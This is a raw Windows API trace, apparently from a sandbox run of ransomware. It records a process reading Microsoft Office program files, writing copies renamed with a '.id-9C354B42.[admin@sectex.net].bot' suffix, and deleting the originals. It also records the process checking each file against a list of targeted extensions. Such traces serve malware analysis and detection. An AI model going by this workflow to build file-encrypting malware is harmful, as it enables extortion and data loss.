	[0159.409] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLJRNL.FAE.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\oljrnl.fae.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0159.652] GetLastError () returned 0x0
	[0159.652] ReadFile (in: hFile=0x1b4, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x117a0, lpOverlapped=0x0) returned 1
	[0159.693] WriteFile (in: hFile=0x3f0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x117b0, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x117b0, lpOverlapped=0x0) returned 1
	[0159.695] ReadFile (in: hFile=0x1b4, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0159.695] WriteFile (in: hFile=0x3f0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0159.696] SetEndOfFile (hFile=0x3f0) returned 1
	[0159.696] CloseHandle (hObject=0x3f0) returned 1
	[0159.696] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.696] SetEndOfFile (hFile=0x1b4) returned 1
	[0159.708] CloseHandle (hObject=0x1b4) returned 1
	[0159.708] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLJRNL.FAE.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0159.708] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLJRNL.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\oljrnl.fae")) returned 1
	[0159.709] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLJRNL.FAE") returned 61
	[0159.709] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLJRNL.FAE") returned 61
	[0159.709] lstrlenW (lpString=".doc") returned 4
	[0159.709] lstrcmpiW (lpString1=".doc", lpString2=".FAE") returned -1
	[0159.709] lstrlenW (lpString=".docx") returned 5
	[0159.709] lstrcmpiW (lpString1=".docx", lpString2="L.FAE") returned -1
	[0159.709] lstrlenW (lpString=".pdf") returned 4
	[0159.709] lstrcmpiW (lpString1=".pdf", lpString2=".FAE") returned 1
	[0159.709] lstrlenW (lpString=".xls") returned 4
	[0159.709] lstrcmpiW (lpString1=".xls", lpString2=".FAE") returned 1
	[0159.709] lstrlenW (lpString=".xlsx") returned 5
	[0159.709] lstrcmpiW (lpString1=".xlsx", lpString2="L.FAE") returned -1
	[0159.709] lstrlenW (lpString=".ppt") returned 4
	[0159.709] lstrcmpiW (lpString1=".ppt", lpString2=".FAE") returned 1
	[0159.709] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLJRNL.FAE") returned 61
	[0159.709] lstrlenW (lpString=".zip") returned 4
	[0159.709] lstrcmpiW (lpString1=".zip", lpString2=".FAE") returned 1
	[0159.709] lstrlenW (lpString=".rar") returned 4
	[0159.709] lstrcmpiW (lpString1=".rar", lpString2=".FAE") returned 1
	[0159.709] lstrlenW (lpString=".bz2") returned 4
	[0159.709] lstrcmpiW (lpString1=".bz2", lpString2=".FAE") returned -1
	[0159.709] lstrlenW (lpString=".7z") returned 3
	[0159.709] lstrcmpiW (lpString1=".7z", lpString2="FAE") returned -1
	[0159.709] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLJRNL.FAE") returned 61
	[0159.710] lstrlenW (lpString=".dbf") returned 4
	[0159.710] lstrcmpiW (lpString1=".dbf", lpString2=".FAE") returned -1
	[0159.710] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLJRNL.FAE") returned 61
	[0159.710] lstrlenW (lpString=".1cd") returned 4
	[0159.710] lstrcmpiW (lpString1=".1cd", lpString2=".FAE") returned -1
	[0159.710] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLJRNL.FAE") returned 61
	[0159.710] lstrlenW (lpString=".jpg") returned 4
	[0159.710] lstrcmpiW (lpString1=".jpg", lpString2=".FAE") returned 1
	[0159.710] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLJRNL.FAE") returned 61
	[0159.710] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLJRNL.FAE") returned 61
	[0159.710] lstrlenW (lpString=".doc") returned 4
	[0159.710] lstrcmpiW (lpString1=".doc", lpString2=".FAE") returned -1
	[0159.710] lstrlenW (lpString=".docx") returned 5
	[0159.710] lstrcmpiW (lpString1=".docx", lpString2="L.FAE") returned -1
	[0159.710] lstrlenW (lpString=".pdf") returned 4
	[0159.710] lstrcmpiW (lpString1=".pdf", lpString2=".FAE") returned 1
	[0159.710] lstrlenW (lpString=".xls") returned 4
	[0159.710] lstrcmpiW (lpString1=".xls", lpString2=".FAE") returned 1
	[0159.710] lstrlenW (lpString=".xlsx") returned 5
	[0159.710] lstrcmpiW (lpString1=".xlsx", lpString2="L.FAE") returned -1
	[0159.710] lstrlenW (lpString=".ppt") returned 4
	[0159.710] lstrcmpiW (lpString1=".ppt", lpString2=".FAE") returned 1
	[0159.710] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLJRNL.FAE") returned 61
	[0159.710] lstrlenW (lpString=".zip") returned 4
	[0159.710] lstrcmpiW (lpString1=".zip", lpString2=".FAE") returned 1
	[0159.710] lstrlenW (lpString=".rar") returned 4
	[0159.710] lstrcmpiW (lpString1=".rar", lpString2=".FAE") returned 1
	[0159.710] lstrlenW (lpString=".bz2") returned 4
	[0159.710] lstrcmpiW (lpString1=".bz2", lpString2=".FAE") returned -1
	[0159.710] lstrlenW (lpString=".7z") returned 3
	[0159.711] lstrcmpiW (lpString1=".7z", lpString2="FAE") returned -1
	[0159.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLJRNL.FAE") returned 61
	[0159.711] lstrlenW (lpString=".dbf") returned 4
	[0159.711] lstrcmpiW (lpString1=".dbf", lpString2=".FAE") returned -1
	[0159.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLJRNL.FAE") returned 61
	[0159.711] lstrlenW (lpString=".1cd") returned 4
	[0159.711] lstrcmpiW (lpString1=".1cd", lpString2=".FAE") returned -1
	[0159.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLJRNL.FAE") returned 61
	[0159.711] lstrlenW (lpString=".jpg") returned 4
	[0159.711] lstrcmpiW (lpString1=".jpg", lpString2=".FAE") returned 1
	[0159.711] lstrcmpiW (lpString1=".dll", lpString2=".bot") returned 1
	[0159.711] lstrlenW (lpString="EntityPicker.dll") returned 16
	[0159.711] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\EntityPicker.dll" (normalized: "c:\\program files\\microsoft office\\office14\\entitypicker.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0159.712] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=268672) returned 1
	[0159.712] CloseHandle (hObject=0x1b4) returned 1
	[0159.712] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\EntityPicker.dll" (normalized: "c:\\program files\\microsoft office\\office14\\entitypicker.dll")) returned 0x20
	[0159.720] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\EntityPicker.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\entitypicker.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.720] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\EntityPicker.dll" (normalized: "c:\\program files\\microsoft office\\office14\\entitypicker.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0159.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EntityPicker.dll") returned 59
	[0159.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EntityPicker.dll") returned 59
	[0159.720] lstrlenW (lpString=".doc") returned 4
	[0159.720] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0159.720] lstrlenW (lpString=".docx") returned 5
	[0159.720] lstrcmpiW (lpString1=".docx", lpString2="r.dll") returned -1
	[0159.720] lstrlenW (lpString=".pdf") returned 4
	[0159.720] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0159.720] lstrlenW (lpString=".xls") returned 4
	[0159.720] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0159.720] lstrlenW (lpString=".xlsx") returned 5
	[0159.721] lstrcmpiW (lpString1=".xlsx", lpString2="r.dll") returned -1
	[0159.721] lstrlenW (lpString=".ppt") returned 4
	[0159.721] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0159.721] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EntityPicker.dll") returned 59
	[0159.721] lstrlenW (lpString=".zip") returned 4
	[0159.721] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0159.721] lstrlenW (lpString=".rar") returned 4
	[0159.721] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0159.721] lstrlenW (lpString=".bz2") returned 4
	[0159.721] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0159.721] lstrlenW (lpString=".7z") returned 3
	[0159.721] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0159.721] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EntityPicker.dll") returned 59
	[0159.721] lstrlenW (lpString=".dbf") returned 4
	[0159.721] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0159.721] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EntityPicker.dll") returned 59
	[0159.721] lstrlenW (lpString=".1cd") returned 4
	[0159.721] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0159.721] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EntityPicker.dll") returned 59
	[0159.721] lstrlenW (lpString=".jpg") returned 4
	[0159.721] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0159.721] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EntityPicker.dll") returned 59
	[0159.721] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EntityPicker.dll") returned 59
	[0159.721] lstrlenW (lpString=".doc") returned 4
	[0159.721] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0159.721] lstrlenW (lpString=".docx") returned 5
	[0159.721] lstrcmpiW (lpString1=".docx", lpString2="r.dll") returned -1
	[0159.721] lstrlenW (lpString=".pdf") returned 4
	[0159.721] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0159.722] lstrlenW (lpString=".xls") returned 4
	[0159.722] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0159.722] lstrlenW (lpString=".xlsx") returned 5
	[0159.722] lstrcmpiW (lpString1=".xlsx", lpString2="r.dll") returned -1
	[0159.722] lstrlenW (lpString=".ppt") returned 4
	[0159.722] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0159.722] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EntityPicker.dll") returned 59
	[0159.722] lstrlenW (lpString=".zip") returned 4
	[0159.722] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0159.722] lstrlenW (lpString=".rar") returned 4
	[0159.722] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0159.722] lstrlenW (lpString=".bz2") returned 4
	[0159.722] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0159.722] lstrlenW (lpString=".7z") returned 3
	[0159.722] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0159.722] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EntityPicker.dll") returned 59
	[0159.722] lstrlenW (lpString=".dbf") returned 4
	[0159.722] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0159.722] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EntityPicker.dll") returned 59
	[0159.722] lstrlenW (lpString=".1cd") returned 4
	[0159.722] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0159.722] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EntityPicker.dll") returned 59
	[0159.722] lstrlenW (lpString=".jpg") returned 4
	[0159.722] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0159.722] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0159.722] lstrlenW (lpString="ENVELOPE.DLL") returned 12
	[0159.723] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ENVELOPE.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\envelope.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0159.723] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=219520) returned 1
	[0159.723] CloseHandle (hObject=0x1b4) returned 1
	[0159.723] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ENVELOPE.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\envelope.dll")) returned 0x20
	[0159.723] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ENVELOPE.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\envelope.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.723] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ENVELOPE.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\envelope.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0159.723] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ENVELOPE.DLL") returned 55
	[0159.724] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ENVELOPE.DLL") returned 55
	[0159.724] lstrlenW (lpString=".doc") returned 4
	[0159.724] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0159.724] lstrlenW (lpString=".docx") returned 5
	[0159.724] lstrcmpiW (lpString1=".docx", lpString2="E.DLL") returned -1
	[0159.724] lstrlenW (lpString=".pdf") returned 4
	[0159.724] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0159.724] lstrlenW (lpString=".xls") returned 4
	[0159.724] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0159.724] lstrlenW (lpString=".xlsx") returned 5
	[0159.724] lstrcmpiW (lpString1=".xlsx", lpString2="E.DLL") returned -1
	[0159.724] lstrlenW (lpString=".ppt") returned 4
	[0159.724] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0159.724] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ENVELOPE.DLL") returned 55
	[0159.724] lstrlenW (lpString=".zip") returned 4
	[0159.724] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0159.724] lstrlenW (lpString=".rar") returned 4
	[0159.724] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0159.724] lstrlenW (lpString=".bz2") returned 4
	[0159.724] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0159.724] lstrlenW (lpString=".7z") returned 3
	[0159.724] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0159.724] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ENVELOPE.DLL") returned 55
	[0159.724] lstrlenW (lpString=".dbf") returned 4
	[0159.724] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0159.724] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ENVELOPE.DLL") returned 55
	[0159.724] lstrlenW (lpString=".1cd") returned 4
	[0159.724] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0159.724] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ENVELOPE.DLL") returned 55
	[0159.724] lstrlenW (lpString=".jpg") returned 4
	[0159.724] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0159.725] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ENVELOPE.DLL") returned 55
	[0159.725] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ENVELOPE.DLL") returned 55
	[0159.725] lstrlenW (lpString=".doc") returned 4
	[0159.725] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0159.725] lstrlenW (lpString=".docx") returned 5
	[0159.725] lstrcmpiW (lpString1=".docx", lpString2="E.DLL") returned -1
	[0159.725] lstrlenW (lpString=".pdf") returned 4
	[0159.725] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0159.725] lstrlenW (lpString=".xls") returned 4
	[0159.725] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0159.725] lstrlenW (lpString=".xlsx") returned 5
	[0159.725] lstrcmpiW (lpString1=".xlsx", lpString2="E.DLL") returned -1
	[0159.725] lstrlenW (lpString=".ppt") returned 4
	[0159.725] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0159.725] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ENVELOPE.DLL") returned 55
	[0159.725] lstrlenW (lpString=".zip") returned 4
	[0159.725] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0159.725] lstrlenW (lpString=".rar") returned 4
	[0159.725] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0159.725] lstrlenW (lpString=".bz2") returned 4
	[0159.725] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0159.725] lstrlenW (lpString=".7z") returned 3
	[0159.725] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0159.725] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ENVELOPE.DLL") returned 55
	[0159.725] lstrlenW (lpString=".dbf") returned 4
	[0159.725] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0159.725] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ENVELOPE.DLL") returned 55
	[0159.725] lstrlenW (lpString=".1cd") returned 4
	[0159.725] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0159.725] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ENVELOPE.DLL") returned 55
	[0159.726] lstrlenW (lpString=".jpg") returned 4
	[0159.726] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0159.726] lstrcmpiW (lpString1=".ADD", lpString2=".bot") returned -1
	[0159.726] lstrlenW (lpString="ERXIMP.ADD") returned 10
	[0159.726] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ERXIMP.ADD" (normalized: "c:\\program files\\microsoft office\\office14\\erximp.add"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0159.727] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=85920) returned 1
	[0159.727] CloseHandle (hObject=0x1b4) returned 1
	[0159.727] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ERXIMP.ADD" (normalized: "c:\\program files\\microsoft office\\office14\\erximp.add")) returned 0x20
	[0159.727] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ERXIMP.ADD.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\erximp.add.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.727] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ERXIMP.ADD" (normalized: "c:\\program files\\microsoft office\\office14\\erximp.add"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0159.727] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.727] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.727] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ERXIMP.ADD.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\erximp.add.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0159.728] GetLastError () returned 0x0
	[0159.728] ReadFile (in: hFile=0x1b4, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x14fa0, lpOverlapped=0x0) returned 1
	[0159.731] WriteFile (in: hFile=0x3f0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x14fb0, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x14fb0, lpOverlapped=0x0) returned 1
	[0159.735] ReadFile (in: hFile=0x1b4, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0159.736] WriteFile (in: hFile=0x3f0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0159.736] SetEndOfFile (hFile=0x3f0) returned 1
	[0159.736] CloseHandle (hObject=0x3f0) returned 1
	[0159.736] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.736] SetEndOfFile (hFile=0x1b4) returned 1
	[0159.739] CloseHandle (hObject=0x1b4) returned 1
	[0159.739] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ERXIMP.ADD.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0159.739] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ERXIMP.ADD" (normalized: "c:\\program files\\microsoft office\\office14\\erximp.add")) returned 1
	[0159.741] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ERXIMP.ADD") returned 53
	[0159.741] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ERXIMP.ADD") returned 53
	[0159.741] lstrlenW (lpString=".doc") returned 4
	[0159.741] lstrcmpiW (lpString1=".doc", lpString2=".ADD") returned 1
	[0159.741] lstrlenW (lpString=".docx") returned 5
	[0159.741] lstrcmpiW (lpString1=".docx", lpString2="P.ADD") returned -1
	[0159.741] lstrlenW (lpString=".pdf") returned 4
	[0159.741] lstrcmpiW (lpString1=".pdf", lpString2=".ADD") returned 1
	[0159.741] lstrlenW (lpString=".xls") returned 4
	[0159.741] lstrcmpiW (lpString1=".xls", lpString2=".ADD") returned 1
	[0159.741] lstrlenW (lpString=".xlsx") returned 5
	[0159.741] lstrcmpiW (lpString1=".xlsx", lpString2="P.ADD") returned -1
	[0159.741] lstrlenW (lpString=".ppt") returned 4
	[0159.741] lstrcmpiW (lpString1=".ppt", lpString2=".ADD") returned 1
	[0159.741] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ERXIMP.ADD") returned 53
	[0159.741] lstrlenW (lpString=".zip") returned 4
	[0159.741] lstrcmpiW (lpString1=".zip", lpString2=".ADD") returned 1
	[0159.741] lstrlenW (lpString=".rar") returned 4
	[0159.741] lstrcmpiW (lpString1=".rar", lpString2=".ADD") returned 1
	[0159.741] lstrlenW (lpString=".bz2") returned 4
	[0159.741] lstrcmpiW (lpString1=".bz2", lpString2=".ADD") returned 1
	[0159.741] lstrlenW (lpString=".7z") returned 3
	[0159.741] lstrcmpiW (lpString1=".7z", lpString2="ADD") returned -1
	[0159.741] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ERXIMP.ADD") returned 53
	[0159.741] lstrlenW (lpString=".dbf") returned 4
	[0159.741] lstrcmpiW (lpString1=".dbf", lpString2=".ADD") returned 1
	[0159.741] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ERXIMP.ADD") returned 53
	[0159.741] lstrlenW (lpString=".1cd") returned 4
	[0159.742] lstrcmpiW (lpString1=".1cd", lpString2=".ADD") returned -1
	[0159.742] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ERXIMP.ADD") returned 53
	[0159.742] lstrlenW (lpString=".jpg") returned 4
	[0159.742] lstrcmpiW (lpString1=".jpg", lpString2=".ADD") returned 1
	[0159.742] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ERXIMP.ADD") returned 53
	[0159.742] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ERXIMP.ADD") returned 53
	[0159.742] lstrlenW (lpString=".doc") returned 4
	[0159.742] lstrcmpiW (lpString1=".doc", lpString2=".ADD") returned 1
	[0159.742] lstrlenW (lpString=".docx") returned 5
	[0159.742] lstrcmpiW (lpString1=".docx", lpString2="P.ADD") returned -1
	[0159.742] lstrlenW (lpString=".pdf") returned 4
	[0159.742] lstrcmpiW (lpString1=".pdf", lpString2=".ADD") returned 1
	[0159.742] lstrlenW (lpString=".xls") returned 4
	[0159.742] lstrcmpiW (lpString1=".xls", lpString2=".ADD") returned 1
	[0159.742] lstrlenW (lpString=".xlsx") returned 5
	[0159.742] lstrcmpiW (lpString1=".xlsx", lpString2="P.ADD") returned -1
	[0159.742] lstrlenW (lpString=".ppt") returned 4
	[0159.742] lstrcmpiW (lpString1=".ppt", lpString2=".ADD") returned 1
	[0159.742] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ERXIMP.ADD") returned 53
	[0159.742] lstrlenW (lpString=".zip") returned 4
	[0159.742] lstrcmpiW (lpString1=".zip", lpString2=".ADD") returned 1
	[0159.742] lstrlenW (lpString=".rar") returned 4
	[0159.742] lstrcmpiW (lpString1=".rar", lpString2=".ADD") returned 1
	[0159.742] lstrlenW (lpString=".bz2") returned 4
	[0159.742] lstrcmpiW (lpString1=".bz2", lpString2=".ADD") returned 1
	[0159.742] lstrlenW (lpString=".7z") returned 3
	[0159.742] lstrcmpiW (lpString1=".7z", lpString2="ADD") returned -1
	[0159.742] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ERXIMP.ADD") returned 53
	[0159.742] lstrlenW (lpString=".dbf") returned 4
	[0159.742] lstrcmpiW (lpString1=".dbf", lpString2=".ADD") returned 1
	[0159.742] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ERXIMP.ADD") returned 53
	[0159.743] lstrlenW (lpString=".1cd") returned 4
	[0159.743] lstrcmpiW (lpString1=".1cd", lpString2=".ADD") returned -1
